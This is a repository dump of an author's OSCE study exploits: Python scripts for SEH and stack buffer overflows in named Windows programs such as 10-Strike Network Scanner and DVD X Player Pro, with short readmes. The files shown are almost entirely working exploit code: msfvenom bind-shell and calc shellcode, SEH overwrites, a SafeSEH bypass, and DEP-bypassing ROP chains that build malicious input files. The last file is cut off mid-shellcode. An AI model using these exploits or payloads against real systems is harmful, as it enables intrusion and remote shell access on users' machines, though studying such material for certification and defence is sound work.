Repository: ihack4falafel/OSCE
Branch: master
Commit: c19500bd3934
Files: 37
Total size: 121.3 KB
Directory structure:
gitextract_ec6vv2vr/
├── Local Buffer Overflow/
│ ├── 10-StrikeNetworkInventoryExplorerv8.54/
│ │ ├── From Text File/
│ │ │ └── Exploit.py
│ │ ├── README.md
│ │ └── Registration Key/
│ │ └── Exploit.py
│ ├── 10-StrikeNetworkScannerv3.0/
│ │ ├── Exploit.py
│ │ └── README.md
│ ├── DVDXPlayerProv5.5/
│ │ ├── VirtualAlloc()/
│ │ │ └── Exploit.py
│ │ ├── VirtualProtect()/
│ │ │ └── Exploit.py
│ │ └── readme.md
│ ├── EasyCDDVDCopyv1.3.24/
│ │ ├── Exploit.py
│ │ └── readme.md
│ ├── EasyRMtoMP3Converterv2.7.3.700/
│ │ ├── Exploit.py
│ │ └── readme.md
│ ├── FTPShellServerv6.80/
│ │ ├── Exploit.py
│ │ └── README.md
│ ├── QuickZipv4.60.019/
│ │ ├── Egg Hunter/
│ │ │ └── Exploit.py
│ │ ├── OS Dependent/
│ │ │ └── Exploit.py
│ │ └── README.md
│ ├── SysGaugeProv4.6.12/
│ │ ├── Exploit.py
│ │ └── readme.md
│ ├── VUPlayerv2.49/
│ │ ├── Exploit.py
│ │ └── readme.md
│ └── Zip-n-Gov4.9/
│ ├── Exploit.py
│ └── README.md
├── README.md
├── Remote Buffer Overflow/
│ ├── EasyFileSharingWebServerv7.2/
│ │ ├── Exploit.py
│ │ └── readme.md
│ └── VulnServer/
│ ├── Bad Characters/
│ │ ├── Exploit.py
│ │ └── README.md
│ ├── CALL [REG]/
│ │ └── Exploit.py
│ ├── Egg Hunter/
│ │ ├── Exploit.py
│ │ └── README.md
│ ├── POP POP RETN/
│ │ └── Exploit.py
│ ├── SEH/
│ │ ├── Exploit.py
│ │ └── README.md
│ └── readme.md
└── Tools/
├── EggHunter.py
└── FuzzMe.py
================================================
FILE CONTENTS
================================================
================================================
FILE: Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/From Text File/Exploit.py
================================================
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : 10-Strike Network Inventory Explorer Standard v8.54 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : https://www.10-strike.com/ #
# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe #
# Tested on : Windows 7 Enterprise - SP1 (x86) #
#----------------------------------------------------------------------------------------------------------#
# Disclosure Timeline:
# ====================
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published
'''
Steps to reproduce:
===================
- Under Computers tab click on 'From Text File'
- Open Evil.txt and boom!
Notes:
======
- The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
- Next SEH offset is 211 bytes but for some reason passing the exception to the program will result in shifting
the stack by 8 bytes, see buffer for reference.
- Keep in mind the exploit is contingent on path, and as such you need to make sure offsets stay intact based on
your username, the following is the path used while developing the exploit (default on Windows 7):
[C:\Users\IEUser\AppData\Roaming\10-strike\Network Inventory\cfg\]
- Pro edition is effected as well.
'''
#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d\x3a\x5c' -f python -v shellcode
#Payload size: 355 bytes
shellcode = ""
shellcode += "\xba\x58\x39\xb1\xae\xd9\xcf\xd9\x74\x24\xf4\x5f"
shellcode += "\x29\xc9\xb1\x53\x83\xef\xfc\x31\x57\x0e\x03\x0f"
shellcode += "\x37\x53\x5b\x53\xaf\x11\xa4\xab\x30\x76\x2c\x4e"
shellcode += "\x01\xb6\x4a\x1b\x32\x06\x18\x49\xbf\xed\x4c\x79"
shellcode += "\x34\x83\x58\x8e\xfd\x2e\xbf\xa1\xfe\x03\x83\xa0"
shellcode += "\x7c\x5e\xd0\x02\xbc\x91\x25\x43\xf9\xcc\xc4\x11"
shellcode += "\x52\x9a\x7b\x85\xd7\xd6\x47\x2e\xab\xf7\xcf\xd3"
shellcode += "\x7c\xf9\xfe\x42\xf6\xa0\x20\x65\xdb\xd8\x68\x7d"
shellcode += "\x38\xe4\x23\xf6\x8a\x92\xb5\xde\xc2\x5b\x19\x1f"
shellcode += "\xeb\xa9\x63\x58\xcc\x51\x16\x90\x2e\xef\x21\x67"
shellcode += "\x4c\x2b\xa7\x73\xf6\xb8\x1f\x5f\x06\x6c\xf9\x14"
shellcode += "\x04\xd9\x8d\x72\x09\xdc\x42\x09\x35\x55\x65\xdd"
shellcode += "\xbf\x2d\x42\xf9\xe4\xf6\xeb\x58\x41\x58\x13\xba"
shellcode += "\x2a\x05\xb1\xb1\xc7\x52\xc8\x98\x8f\x97\xe1\x22"
shellcode += "\x50\xb0\x72\x51\x62\x1f\x29\xfd\xce\xe8\xf7\xfa"
shellcode += "\x31\xc3\x40\x94\xcf\xec\xb0\xbd\x0b\xb8\xe0\xd5"
shellcode += "\xba\xc1\x6a\x25\x42\x14\x06\x2d\xe5\xc7\x35\xd0"
shellcode += "\x55\xb8\xf9\x7a\x3e\xd2\xf5\xa5\x5e\xdd\xdf\xce"
shellcode += "\xf7\x20\xe0\xe1\x5b\xac\x06\x6b\x74\xf8\x91\x03"
shellcode += "\xb6\xdf\x29\xb4\xc9\x35\x02\x52\x81\x5f\x95\x5d"
shellcode += "\x12\x4a\xb1\xc9\x99\x99\x05\xe8\x9d\xb7\x2d\x7d"
shellcode += "\x09\x4d\xbc\xcc\xab\x52\x95\xa6\x48\xc0\x72\x36"
shellcode += "\x06\xf9\x2c\x61\x4f\xcf\x24\xe7\x7d\x76\x9f\x15"
shellcode += "\x7c\xee\xd8\x9d\x5b\xd3\xe7\x1c\x29\x6f\xcc\x0e"
shellcode += "\xf7\x70\x48\x7a\xa7\x26\x06\xd4\x01\x91\xe8\x8e"
shellcode += "\xdb\x4e\xa3\x46\x9d\xbc\x74\x10\xa2\xe8\x02\xfc"
shellcode += "\x13\x45\x53\x03\x9b\x01\x53\x7c\xc1\xb1\x9c\x57"
shellcode += "\x41\xc1\xd6\xf5\xe0\x4a\xbf\x6c\xb1\x16\x40\x5b"
shellcode += "\xf6\x2e\xc3\x69\x87\xd4\xdb\x18\x82\x91\x5b\xf1"
shellcode += "\xfe\x8a\x09\xf5\xad\xab\x1b"
buffer = '\x41' * 207 # filler to nSEH offset (211-4)
buffer += '\x9f\x4e\xe9\x61' # 0x61E94E9F [sqlite3.dll] | jmp esp
buffer += '\x90\x90\x90\x90' # nSEH
buffer += '\x90\x90\x90\x90' # SEH
buffer += shellcode # bind shell
buffer += '\xcc' * (3000-207-12-len(shellcode)) # junk
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
================================================
FILE: Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/README.md
================================================
### 10-Strike Network Inventory Explorer 8.54
Structured Exception Handler (SEH) overwrite exploit found while studying for OSCE. See the link [EDB-ID: 44841](https://www.exploit-db.com/exploits/44838/) and [EDB-ID: 44840](https://www.exploit-db.com/exploits/44840/)
<p align="center">
<img src="https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/10-StrikeNetworkInventoryExplorerv8.54/From%20Text%20File/PoC.gif">
</p>
================================================
FILE: Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/Registration Key/Exploit.py
================================================
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : 10-Strike Network Inventory Explorer Standard v8.54 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : https://www.10-strike.com/ #
# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe #
# Tested on : Windows 7 Enterprise - SP1 (x86) #
#----------------------------------------------------------------------------------------------------------#
# Disclosure Timeline:
# ====================
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published
'''
Steps to reproduce:
===================
- Under Help, click 'Enter Registration Key'.
- Paste the contents of Evil.txt and click OK.
Notes:
======
- The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
- There is ample space prior to SEH overwrite.
- Pro edition is effected as well.
'''
#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -f python -v shellcode
#Payload size: 355 bytes
shellcode = ""
shellcode += "\xbf\xad\xa8\x1e\x44\xdd\xc0\xd9\x74\x24\xf4\x5e"
shellcode += "\x2b\xc9\xb1\x53\x83\xc6\x04\x31\x7e\x0e\x03\xd3"
shellcode += "\xa6\xfc\xb1\xd7\x5f\x82\x3a\x27\xa0\xe3\xb3\xc2"
shellcode += "\x91\x23\xa7\x87\x82\x93\xa3\xc5\x2e\x5f\xe1\xfd"
shellcode += "\xa5\x2d\x2e\xf2\x0e\x9b\x08\x3d\x8e\xb0\x69\x5c"
shellcode += "\x0c\xcb\xbd\xbe\x2d\x04\xb0\xbf\x6a\x79\x39\xed"
shellcode += "\x23\xf5\xec\x01\x47\x43\x2d\xaa\x1b\x45\x35\x4f"
shellcode += "\xeb\x64\x14\xde\x67\x3f\xb6\xe1\xa4\x4b\xff\xf9"
shellcode += "\xa9\x76\x49\x72\x19\x0c\x48\x52\x53\xed\xe7\x9b"
shellcode += "\x5b\x1c\xf9\xdc\x5c\xff\x8c\x14\x9f\x82\x96\xe3"
shellcode += "\xdd\x58\x12\xf7\x46\x2a\x84\xd3\x77\xff\x53\x90"
shellcode += "\x74\xb4\x10\xfe\x98\x4b\xf4\x75\xa4\xc0\xfb\x59"
shellcode += "\x2c\x92\xdf\x7d\x74\x40\x41\x24\xd0\x27\x7e\x36"
shellcode += "\xbb\x98\xda\x3d\x56\xcc\x56\x1c\x3f\x21\x5b\x9e"
shellcode += "\xbf\x2d\xec\xed\x8d\xf2\x46\x79\xbe\x7b\x41\x7e"
shellcode += "\xc1\x51\x35\x10\x3c\x5a\x46\x39\xfb\x0e\x16\x51"
shellcode += "\x2a\x2f\xfd\xa1\xd3\xfa\x68\xa9\x72\x55\x8f\x54"
shellcode += "\xc4\x05\x0f\xf6\xad\x4f\x80\x29\xcd\x6f\x4a\x42"
shellcode += "\x66\x92\x75\x7d\x2b\x1b\x93\x17\xc3\x4d\x0b\x8f"
shellcode += "\x21\xaa\x84\x28\x59\x98\xbc\xde\x12\xca\x7b\xe1"
shellcode += "\xa2\xd8\x2b\x75\x29\x0f\xe8\x64\x2e\x1a\x58\xf1"
shellcode += "\xb9\xd0\x09\xb0\x58\xe4\x03\x22\xf8\x77\xc8\xb2"
shellcode += "\x77\x64\x47\xe5\xd0\x5a\x9e\x63\xcd\xc5\x08\x91"
shellcode += "\x0c\x93\x73\x11\xcb\x60\x7d\x98\x9e\xdd\x59\x8a"
shellcode += "\x66\xdd\xe5\xfe\x36\x88\xb3\xa8\xf0\x62\x72\x02"
shellcode += "\xab\xd9\xdc\xc2\x2a\x12\xdf\x94\x32\x7f\xa9\x78"
shellcode += "\x82\xd6\xec\x87\x2b\xbf\xf8\xf0\x51\x5f\x06\x2b"
shellcode += "\xd2\x6f\x4d\x71\x73\xf8\x08\xe0\xc1\x65\xab\xdf"
shellcode += "\x06\x90\x28\xd5\xf6\x67\x30\x9c\xf3\x2c\xf6\x4d"
shellcode += "\x8e\x3d\x93\x71\x3d\x3d\xb6"
buffer = '\x41' * 4188 # filler to nSEH
buffer += '\x75\x06\x74\x06' # nSEH | jump net
buffer += '\x7a\x49\xe8\x61' # SEH | 0x61e8497a : pop esi # pop edi # ret | [sqlite3.dll]
buffer += '\x90' * 8 # nops
buffer += shellcode # bind shell
buffer += '\x41' * (5000-4188-16-len(shellcode)) # junk
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
================================================
FILE: Local Buffer Overflow/10-StrikeNetworkScannerv3.0/Exploit.py
================================================
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : 10-Strike Network Scanner v3.0 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : https://www.10-strike.com/ #
# Vulnerable Software: https://www.10-strike.com/network-scanner/network-scanner.exe #
# Tested on : Windows XP Professional - SP3 (x86) #
#----------------------------------------------------------------------------------------------------------#
# Disclosure Timeline:
# ====================
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published
'''
Steps to reproduce:
===================
- Copy contents of Evil.txt and paste in 'Host name or address' field under Add host.
- Right-click on newly created host and click 'Trace route...'.
- Repeat the second step and boom.
Notes:
======
- '\x00' get converted to '\x20' by the program eliminating the possibility of using [pop, pop, retn] pointers in base binary.
- All loaded modules are compiled with /SafeSEH.
- Right-click on newly created host and click 'System information>General' is effected by the same vulnerability with different
offsets and buffer size.
'''
#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -v shellcode -f python
#Payload size: 355 bytes
shellcode = ""
shellcode += "\xb8\x2b\x29\xa7\x48\xd9\xe8\xd9\x74\x24\xf4\x5b"
shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\xc0"
shellcode += "\xd5\x45\xbd\xea\xce\x08\x3e\x12\x0f\x6d\xb6\xf7"
shellcode += "\x3e\xad\xac\x7c\x10\x1d\xa6\xd0\x9d\xd6\xea\xc0"
shellcode += "\x16\x9a\x22\xe7\x9f\x11\x15\xc6\x20\x09\x65\x49"
shellcode += "\xa3\x50\xba\xa9\x9a\x9a\xcf\xa8\xdb\xc7\x22\xf8"
shellcode += "\xb4\x8c\x91\xec\xb1\xd9\x29\x87\x8a\xcc\x29\x74"
shellcode += "\x5a\xee\x18\x2b\xd0\xa9\xba\xca\x35\xc2\xf2\xd4"
shellcode += "\x5a\xef\x4d\x6f\xa8\x9b\x4f\xb9\xe0\x64\xe3\x84"
shellcode += "\xcc\x96\xfd\xc1\xeb\x48\x88\x3b\x08\xf4\x8b\xf8"
shellcode += "\x72\x22\x19\x1a\xd4\xa1\xb9\xc6\xe4\x66\x5f\x8d"
shellcode += "\xeb\xc3\x2b\xc9\xef\xd2\xf8\x62\x0b\x5e\xff\xa4"
shellcode += "\x9d\x24\x24\x60\xc5\xff\x45\x31\xa3\xae\x7a\x21"
shellcode += "\x0c\x0e\xdf\x2a\xa1\x5b\x52\x71\xae\xa8\x5f\x89"
shellcode += "\x2e\xa7\xe8\xfa\x1c\x68\x43\x94\x2c\xe1\x4d\x63"
shellcode += "\x52\xd8\x2a\xfb\xad\xe3\x4a\xd2\x69\xb7\x1a\x4c"
shellcode += "\x5b\xb8\xf0\x8c\x64\x6d\x6c\x84\xc3\xde\x93\x69"
shellcode += "\xb3\x8e\x13\xc1\x5c\xc5\x9b\x3e\x7c\xe6\x71\x57"
shellcode += "\x15\x1b\x7a\x46\xba\x92\x9c\x02\x52\xf3\x37\xba"
shellcode += "\x90\x20\x80\x5d\xea\x02\xb8\xc9\xa3\x44\x7f\xf6"
shellcode += "\x33\x43\xd7\x60\xb8\x80\xe3\x91\xbf\x8c\x43\xc6"
shellcode += "\x28\x5a\x02\xa5\xc9\x5b\x0f\x5d\x69\xc9\xd4\x9d"
shellcode += "\xe4\xf2\x42\xca\xa1\xc5\x9a\x9e\x5f\x7f\x35\xbc"
shellcode += "\x9d\x19\x7e\x04\x7a\xda\x81\x85\x0f\x66\xa6\x95"
shellcode += "\xc9\x67\xe2\xc1\x85\x31\xbc\xbf\x63\xe8\x0e\x69"
shellcode += "\x3a\x47\xd9\xfd\xbb\xab\xda\x7b\xc4\xe1\xac\x63"
shellcode += "\x75\x5c\xe9\x9c\xba\x08\xfd\xe5\xa6\xa8\x02\x3c"
shellcode += "\x63\xd8\x48\x1c\xc2\x71\x15\xf5\x56\x1c\xa6\x20"
shellcode += "\x94\x19\x25\xc0\x65\xde\x35\xa1\x60\x9a\xf1\x5a"
shellcode += "\x19\xb3\x97\x5c\x8e\xb4\xbd"
magic = '\xd9\xee' # fldz
magic += '\xd9\x74\x24\xf4' # fnstenv [esp-0xc]
magic += '\x59' # pop ecx
magic += '\x80\xc1\x05' # add cl,0x5
magic += '\x80\xc1\x05' # add cl,0x5
magic += '\x90' # nop
magic += '\xfe\xcd' # dec ch
magic += '\xfe\xcd' # dec ch
magic += '\xff\xe1' # jmp ecx
buffer = '\x90' * 28 # nops
buffer += shellcode # bind shell
buffer += '\xcc' * (516-28-len(shellcode)) # filler to nSEH
buffer += '\x75\x06\x74\x06' # nSEH | jump net
buffer += '\x18\x05\xfc\x7f' # SEH | 0x7ffc0518 : pop edi # pop edi # ret [SafeSEH Bypass]
buffer += '\x90' * 5 # nops
buffer += magic # jump -512
buffer += '\xcc' * (3000-516-4-4-5-len(magic)) # junk
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
================================================
FILE: Local Buffer Overflow/10-StrikeNetworkScannerv3.0/README.md
================================================
### 10-Strike Network Scanner v3.0
Structured Exception Handler (SEH) overwrite exploit found while studying for OSCE. See the link [EDB-ID: 44841](https://www.exploit-db.com/exploits/44841/)
<p align="center">
<img src="https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/10-StrikeNetworkScannerv3.0/PoC.gif">
</p>
================================================
FILE: Local Buffer Overflow/DVDXPlayerProv5.5/VirtualAlloc()/Exploit.py
================================================
#!/usr/bin/env python
import struct
import time
# bad characters "\x00\x0a\x0d\x1a\x20"
shellcode = ""
shellcode += "\xba\xad\xe1\xd9\x21\xda\xd8\xd9\x74\x24\xf4\x5e\x33"
shellcode += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xa2\x03"
shellcode += "\x2c\xdd\x54\x41\xcf\x1e\xa4\x26\x59\xfb\x95\x66\x3d"
shellcode += "\x8f\x85\x56\x35\xdd\x29\x1c\x1b\xf6\xba\x50\xb4\xf9"
shellcode += "\x0b\xde\xe2\x34\x8c\x73\xd6\x57\x0e\x8e\x0b\xb8\x2f"
shellcode += "\x41\x5e\xb9\x68\xbc\x93\xeb\x21\xca\x06\x1c\x46\x86"
shellcode += "\x9a\x97\x14\x06\x9b\x44\xec\x29\x8a\xda\x67\x70\x0c"
shellcode += "\xdc\xa4\x08\x05\xc6\xa9\x35\xdf\x7d\x19\xc1\xde\x57"
shellcode += "\x50\x2a\x4c\x96\x5d\xd9\x8c\xde\x59\x02\xfb\x16\x9a"
shellcode += "\xbf\xfc\xec\xe1\x1b\x88\xf6\x41\xef\x2a\xd3\x70\x3c"
shellcode += "\xac\x90\x7e\x89\xba\xff\x62\x0c\x6e\x74\x9e\x85\x91"
shellcode += "\x5b\x17\xdd\xb5\x7f\x7c\x85\xd4\x26\xd8\x68\xe8\x39"
shellcode += "\x83\xd5\x4c\x31\x29\x01\xfd\x18\x27\xd4\x73\x27\x05"
shellcode += "\xd6\x8b\x28\x39\xbf\xba\xa3\xd6\xb8\x42\x66\x93\x37"
shellcode += "\x09\x2b\xb5\xdf\xd4\xb9\x84\xbd\xe6\x17\xca\xbb\x64"
shellcode += "\x92\xb2\x3f\x74\xd7\xb7\x04\x32\x0b\xc5\x15\xd7\x2b"
shellcode += "\x7a\x15\xf2\x4f\x1d\x85\x9e\xa1\xb8\x2d\x04\xbe"
buffer = "\x41" * 260 # eip offset
#----------------------------------------#
# ROP Chain setup for VirtualAlloc() #
#----------------------------------------#
# EAX = NOP (0x90909090) #
# ECX = flProtect (0x40) #
# EDX = flAllocationType (0x1000) #
# EBX = dwSize #
# ESP = lpAddress (automatic) #
# EBP = ReturnTo (ptr to jmp esp) #
# ESI = ptr to VirtualAlloc() #
# EDI = ROP NOP (RETN) #
#----------------------------------------#
buffer += struct.pack('<L', 0x6033cda2) # POP EAX # RETN [Configuration.dll]
buffer += "MMMM" # compensate (filler)
buffer += "MMMM" # compensate (filler)
buffer += "WWWW" # compensate (filler)
buffer += "WWWW" # compensate (filler)
buffer += struct.pack('<L', 0x603662fc) # ptr to &VirtualAlloc() [IAT Configuration.dll]
buffer += struct.pack('<L', 0x6410b24d) # MOV EAX,DWORD PTR DS:[EAX] # RETN [NetReg.dll]
buffer += struct.pack('<L', 0x616385d8) # XCHG EAX,ESI # RETN 0x00 [EPG.dll]
buffer += struct.pack('<L', 0x61626545) # POP EBP # RETN [EPG.dll]
buffer += struct.pack('<L', 0x6035453b) # & push esp # ret 0x10 [Configuration.dll]
buffer += struct.pack('<L', 0x64022e0f) # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xfffffaff) # value to negate, will become 0x00000501
buffer += struct.pack('<L', 0x64037950) # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x61640124) # XCHG EAX,EBX # RETN [EPG.dll]
buffer += struct.pack('<L', 0x64022e0f) # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xffffffc0) # value to negate, will become 0x00000040
buffer += struct.pack('<L', 0x64037950) # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x60366fe4) # XCHG EAX,ECX # RETN [Configuration.dll]
buffer += struct.pack('<L', 0x64022e0f) # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xffffefff) # value to negate, will become 0x00001000
buffer += struct.pack('<L', 0x61628105) # INC EAX # RETN [EPG.dll]
buffer += struct.pack('<L', 0x64037950) # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x61608ba2) # XCHG EAX,EDX # RETN [EPG.dll]
buffer += struct.pack('<L', 0x6162c3b0) # POP EDI # RETN [EPG.dll]
buffer += struct.pack('<L', 0x64041804) # RETN (ROP NOP) [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x640390d3) # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x90909090) # NOP
buffer += struct.pack('<L', 0x60358d9f) # PUSHAD # RETN [Configuration.dll]
buffer += "\x90" * 20
buffer += shellcode
buffer += "\x90" * 20
buffer += "\x43" * (1500-260-(4*28)-40-len(shellcode))
try:
f=open("OpenMe.plf","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
time.sleep(1)
f.write(buffer)
f.close()
print "[+] File created. Load that shit up!"
except:
print "File cannot be created"
================================================
FILE: Local Buffer Overflow/DVDXPlayerProv5.5/VirtualProtect()/Exploit.py
================================================
#!/usr/bin/env python
import struct
import time
# bad characters "\x00\x0a\x0d\x1a\x20"
shellcode = ""
shellcode += "\xba\xad\xe1\xd9\x21\xda\xd8\xd9\x74\x24\xf4\x5e\x33"
shellcode += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xa2\x03"
shellcode += "\x2c\xdd\x54\x41\xcf\x1e\xa4\x26\x59\xfb\x95\x66\x3d"
shellcode += "\x8f\x85\x56\x35\xdd\x29\x1c\x1b\xf6\xba\x50\xb4\xf9"
shellcode += "\x0b\xde\xe2\x34\x8c\x73\xd6\x57\x0e\x8e\x0b\xb8\x2f"
shellcode += "\x41\x5e\xb9\x68\xbc\x93\xeb\x21\xca\x06\x1c\x46\x86"
shellcode += "\x9a\x97\x14\x06\x9b\x44\xec\x29\x8a\xda\x67\x70\x0c"
shellcode += "\xdc\xa4\x08\x05\xc6\xa9\x35\xdf\x7d\x19\xc1\xde\x57"
shellcode += "\x50\x2a\x4c\x96\x5d\xd9\x8c\xde\x59\x02\xfb\x16\x9a"
shellcode += "\xbf\xfc\xec\xe1\x1b\x88\xf6\x41\xef\x2a\xd3\x70\x3c"
shellcode += "\xac\x90\x7e\x89\xba\xff\x62\x0c\x6e\x74\x9e\x85\x91"
shellcode += "\x5b\x17\xdd\xb5\x7f\x7c\x85\xd4\x26\xd8\x68\xe8\x39"
shellcode += "\x83\xd5\x4c\x31\x29\x01\xfd\x18\x27\xd4\x73\x27\x05"
shellcode += "\xd6\x8b\x28\x39\xbf\xba\xa3\xd6\xb8\x42\x66\x93\x37"
shellcode += "\x09\x2b\xb5\xdf\xd4\xb9\x84\xbd\xe6\x17\xca\xbb\x64"
shellcode += "\x92\xb2\x3f\x74\xd7\xb7\x04\x32\x0b\xc5\x15\xd7\x2b"
shellcode += "\x7a\x15\xf2\x4f\x1d\x85\x9e\xa1\xb8\x2d\x04\xbe"
buffer = "\x41" * 260 # eip offset
#----------------------------------------#
# ROP Chain setup for VirtualProtect() #
#----------------------------------------#
# EAX = NOP (0x90909090) #
# ECX = lpOldProtect (ptr to W address) #
# EDX = NewProtect (0x40) #
# EBX = dwSize #
# ESP = lPAddress (automatic) #
# EBP = ReturnTo (ptr to jmp esp) #
# ESI = ptr to VirtualProtect() #
# EDI = ROP NOP (RETN) #
#----------------------------------------#
buffer += struct.pack('<L', 0x6033cda2) # POP EAX # RETN [Configuration.dll]
buffer += "MMMM" # compensate (filler)
buffer += "MMMM" # compensate (filler)
buffer += "WWWW" # compensate (filler)
buffer += "WWWW" # compensate (filler)
buffer += struct.pack('<L', 0x60366238) # ptr to &VirtualProtect() [IAT Configuration.dll]
buffer += struct.pack('<L', 0x6410b24d) # MOV EAX,DWORD PTR DS:[EAX] # RETN [NetReg.dll]
buffer += struct.pack('<L', 0x616385d8) # XCHG EAX,ESI # RETN 0x00 [EPG.dll]
buffer += struct.pack('<L', 0x61626545) # POP EBP # RETN [EPG.dll]
buffer += struct.pack('<L', 0x6035453b) # & push esp # ret 0x10 [Configuration.dll]
buffer += struct.pack('<L', 0x64022e0f) # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xfffffaff) # value to negate, will become 0x00000501
buffer += struct.pack('<L', 0x64037950) # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x61640124) # XCHG EAX,EBX # RETN [EPG.dll]
buffer += struct.pack('<L', 0x64022e0f) # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xffffffc0) # value to negate, will become 0x00000040
buffer += struct.pack('<L', 0x64037950) # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x61608ba2) # XCHG EAX,EDX # RETN [EPG.dll]
buffer += struct.pack('<L', 0x603636a4) # POP ECX # RETN [Configuration.dll]
buffer += struct.pack('<L', 0x6411cdfc) # &Writable location [NetReg.dll]
buffer += struct.pack('<L', 0x6162c3b0) # POP EDI # RETN [EPG.dll]
buffer += struct.pack('<L', 0x64041804) # RETN (ROP NOP) [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x640390d3) # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x90909090) # NOP
buffer += struct.pack('<L', 0x60358d9f) # PUSHAD # RETN [Configuration.dll]
buffer += "\x90" * 20
buffer += shellcode
buffer += "\x90" * 20
buffer += "\x43" * (1500-260-(4*25)-40-len(shellcode))
try:
f=open("OpenMe.plf","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
time.sleep(1)
f.write(buffer)
f.close()
print "[+] File created. Load that shit up!"
except:
print "File cannot be created"
================================================
FILE: Local Buffer Overflow/DVDXPlayerProv5.5/readme.md
================================================
### DVD X Player Pro v5.5
Local Buffer Overflow exploit with DEP bypass (ROP gadgets) using VirtualAlloc() & VirtualProtect() APIs.
================================================
FILE: Local Buffer Overflow/EasyCDDVDCopyv1.3.24/Exploit.py
================================================
#!/usr/bin/python
###############################################################################
# Exploit Title : Easy CD DVD Copy v1.3.24 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.divxtodvd.net/index.htm #
# Vulnerable Software: http://www.divxtodvd.net/easy_cd_dvd_copy.exe #
# Tested on OS : Windows XP professional SP3 - (996 bytes offset) #
# Windows 7 Enterprise SP1 - (1008 bytes offset) #
# Windows 10 Professional 64bit - (988 bytes offset) #
# Steps to reproduce : #
# ~ Copy the content of OpenMe.txt #
# ~ Click on Register #
# ~ Paste content in "Enter User Name" field #
###############################################################################
import struct
#root@kali:~# msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v shellcode (220 bytes)
shellcode = ""
shellcode += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d"
shellcode += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5"
shellcode += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde"
shellcode += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb"
shellcode += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32"
shellcode += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84"
shellcode += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27"
shellcode += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3"
shellcode += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5"
shellcode += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8"
shellcode += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3"
